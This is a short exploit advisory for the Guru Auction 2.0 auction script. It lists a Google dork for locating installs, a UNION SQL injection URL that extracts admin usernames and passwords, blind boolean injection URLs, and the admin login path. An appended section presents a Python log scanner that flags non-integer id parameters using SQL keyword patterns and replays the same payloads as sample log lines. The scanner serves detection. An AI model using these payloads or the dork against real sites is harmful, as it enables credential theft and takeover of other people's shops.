Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

Admin login page:
~~~~~~~~~~
http://domain.tld/[path]/admin/
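Added here as a defensive example (not part of the advisory and not the vendor's code): a small Python scanner that reads Apache combined-format access log lines and flags any request to subcat.php or detail.php whose cate_id/item_id value is not a plain integer, which is exactly the validation the application should apply before the value reaches a query. The /shop/ install path and the sample log lines are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse, parse_qs

# The two endpoints and integer parameters named in the advisory.
NUMERIC_PARAMS = {"subcat.php": "cate_id", "detail.php": "item_id"}

# Tokens typical of the UNION and boolean-blind payload shapes shown above.
SQL_MARKERS = re.compile(
    r"\b(union|select|substring|from|and|or)\b|@@|--|\bchar\(", re.IGNORECASE
)

# Apache combined log format; enough to pull out the client, request URL and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def check_id_param(url):
    """Return (script, param, value, markers) when the id parameter is not a plain integer, else None."""
    parsed = urlparse(url)
    script = parsed.path.rsplit("/", 1)[-1]
    param = NUMERIC_PARAMS.get(script)
    if param is None:
        return None
    # parse_qs already turns '+' into spaces and decodes %XX escapes, as the server would.
    for value in parse_qs(parsed.query, keep_blank_values=True).get(param, []):
        if re.fullmatch(r"-?\d+", value):
            continue  # a well-formed integer is all that strict validation (or a cast) should accept
        markers = sorted({m.group(0).lower() for m in SQL_MARKERS.finditer(value)})
        return script, param, value, markers
    return None


def scan_log(lines):
    """Return one alert dict per log line whose id parameter fails integer validation."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line in the expected format
        hit = check_id_param(m["url"])
        if hit:
            script, param, value, markers = hit
            alerts.append({"ip": m["ip"], "script": script, "param": param,
                           "value": value, "markers": markers, "status": m["status"]})
    return alerts


# Constructed sample log lines: one benign request, then the two payload shapes from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:56:07 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 7012 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The same integer check, applied server-side before the parameter is used, is what closes both the UNION and the blind variant; the markers list only exists to make a log alert easier to triage.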